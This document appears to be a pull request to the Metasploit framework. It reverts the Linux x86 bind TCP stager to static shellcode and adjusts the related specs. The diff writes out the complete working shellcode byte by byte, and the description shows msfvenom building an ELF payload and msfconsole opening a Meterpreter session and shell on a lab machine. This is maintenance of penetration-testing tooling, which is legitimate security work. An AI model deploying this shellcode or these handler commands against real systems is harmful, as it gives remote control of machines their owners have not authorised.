### PR TITLE
rollback linux bind_tcp stager metasm port

### DIFF
--- a/modules/payloads/stagers/linux/x86/bind_tcp.rb
+++ b/modules/payloads/stagers/linux/x86/bind_tcp.rb
@@ -6,26 +6,86 @@
 
 require 'msf/core'
 require 'msf/core/handler/bind_tcp'
-require 'msf/core/payload/linux/bind_tcp'
 
-module Metasploit4
 
-  CachedSize = :dynamic
+###
+#
+# BindTcp
+# -------
+#
+# Linux bind TCP stager.
+#
+###
+module Metasploit3
+
+  CachedSize = 79
 
   include Msf::Payload::Stager
-  include Msf::Payload::Linux::BindTcp
+  include Msf::Payload::Linux
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'          => 'Bind TCP Stager (Linux x86)',
-      'Description'   => 'Listen for a connection (Linux x86)',
-      'Author'        => [ 'skape', 'egypt', ],
+      'Name'          => 'Bind TCP Stager',
+      'Description'   => 'Listen for a connection',
+      'Author'        => [
+          'skape',  # original
+          'egypt',  # NX support
+        ],
       'License'       => MSF_LICENSE,
       'Platform'      => 'linux',
       'Arch'          => ARCH_X86,
       'Handler'       => Msf::Handler::BindTcp,
-      'Convention'    => 'sockedi',
-      'Stager'        => { 'RequiresMidstager' => true }
+      'Stager'        =>
+        {
+          'Offsets' =>
+            {
+              'LPORT' => [ 0x29, 'n'    ],
+            },
+          'Payload' =>
+
+              "\x6a\x7d"             +#   push byte +0x7d
+              "\x58"                 +#   pop eax
+              "\x99"                 +#   cdq
+              "\xb2\x07"             +#   mov dl,0x7
+              "\xb9\x00\x10\x00\x00" +#   mov ecx,0x1000
+              "\x89\xe3"             +#   mov ebx,esp
+              "\x66\x81\xe3\x00\xf0" +#   and bx,0xf000
+              "\xcd\x80"             +#   int 0x80
+              "\x31\xdb"             +#   xor ebx,ebx
+              "\xf7\xe3"             +#   mul ebx
+              "\x53"                 +#   push ebx
+              "\x43"                 +#   inc ebx
+              "\x53"                 +#   push ebx
+              "\x6a\x02"             +#   push byte +0x2
+              "\x89\xe1"             +#   mov ecx,esp
+              "\xb0\x66"             +#   mov al,0x66
+              "\xcd\x80"             +#   int 0x80
+              "\x5b"                 +#   pop ebx
+              "\x5e"                 +#   pop esi
+              "\x52"                 +#   push edx
+              "\x68\x02\x00\xbf\xbf" +#   push dword 0xbfbf0002
+              "\x6a\x10"             +#   push byte +0x10
+              "\x51"                 +#   push ecx
+              "\x50"                 +#   push eax
+              "\x89\xe1"             +#   mov ecx,esp
+              "\x6a\x66"             +#   push byte +0x66
+              "\x58"                 +#   pop eax
+              "\xcd\x80"             +#   int 0x80
+              "\xd1\xe3"             +#   shl ebx,1
+              "\xb0\x66"             +#   mov al,0x66
+              "\xcd\x80"             +#   int 0x80
+              "\x43"                 +#   inc ebx
+              "\xb0\x66"             +#   mov al,0x66
+              "\x89\x51\x04"         +#   mov [ecx+0x4],edx
+              "\xcd\x80"             +#   int 0x80
+              "\x93"                 +#   xchg eax,ebx
+              "\xb6\x0c"             +#   mov dh,0xc
+              "\xb0\x03"             +#   mov al,0x3
+              "\xcd\x80"             +#   int 0x80
+              "\x89\xdf"             +#   mov edi,ebx
+              "\xff\xe1"              #   jmp ecx
+
+        }
       ))
   end
 

--- a/spec/modules/payloads_spec.rb
+++ b/spec/modules/payloads_spec.rb
@@ -1348,7 +1348,7 @@ describe 'modules/payloads', :content do
                               'stagers/linux/x86/bind_tcp',
                               'stages/linux/x86/meterpreter'
                           ],
-                          dynamic_size: true,
+                          dynamic_size: false,
                           modules_pathname: modules_pathname,
                           reference_name: 'linux/x86/meterpreter/bind_tcp'
   end
@@ -1455,7 +1455,7 @@ describe 'modules/payloads', :content do
                               'stagers/linux/x86/bind_tcp',
                               'stages/linux/x86/shell'
                           ],
-                          dynamic_size: true,
+                          dynamic_size: false,
                           modules_pathname: modules_pathname,
                           reference_name: 'linux/x86/shell/bind_tcp'
   end


### PR DESCRIPTION
The new metasm port of the linux bind_tcp stager doesn't yet generate valid executables. While we're debugging the problem, this reverts the bind_tcp.rb stager to use the static ASM again.
# Verification
- [x] all specs continue to pass, stager is not marked as dynamic
- [x] msfvenom generates a valid payload without any error messages

```
./msfvenom -p linux/x86/meterpreter/bind_tcp LPORT=4444 -f elf -o bindx-works
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Saved as: bindx-works
```
- [ ] bind_tcp stager functions properly

```
./msfconsole -qx 'use exploit/multi/handler; set payload linux/x86/meterpreter/bind_tcp; set rhost 192.168.56.102; set rport 4444; run'
payload => linux/x86/meterpreter/bind_tcp
rhost => 192.168.56.102
rport => 4444
[*] Started bind handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1490944 bytes) to 192.168.56.102
[*] Meterpreter session 1 opened (192.168.56.1:53891 -> 192.168.56.102:4444) at 2015-05-06 09:28:37 -0500

meterpreter > sysinfo
Computer     : mint-vm
OS           : Linux mint-vm 3.13.0-37-generic #64-Ubuntu SMP Mon Sep 22 21:28:38 UTC 2014 (x86_64)
Architecture : x86_64
Meterpreter  : x86/linux
meterpreter > shell
Process 10672 created.
Channel 1 created.

$ echo "Hi"
Hi
```
